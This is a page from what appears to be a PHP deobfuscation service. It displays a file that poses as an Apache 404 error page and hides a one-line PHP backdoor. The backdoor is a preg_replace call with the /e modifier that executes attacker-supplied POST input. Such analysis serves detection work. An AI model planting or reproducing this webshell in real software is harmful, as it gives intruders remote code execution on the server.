Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</ti..

Decoded Output download

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> 
<html><head> 
<title>404 Not Found</title> 
</head><body> 
<h1>Not Found</h1> 
<p>The requested URL /test/download/test1.php was not found on this server.</p> 
</body></html> 
<?php   
@preg_replace("/[checksql]/e",$_POST['heroes'],"saft");   
?>  
 

Did this file decode correctly?

Original Code

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /test/download/test1.php was not found on this server.</p>
</body></html>
<?php  
@preg_replace("/[checksql]/e",$_POST['heroes'],"saft");  
?> 
 

Function Calls

preg_replace 1

Variables

None

Stats

MD5 d1096b4fce3cb0cebc1cf9160da14c58
Eval Count 1
Decode Time 111 ms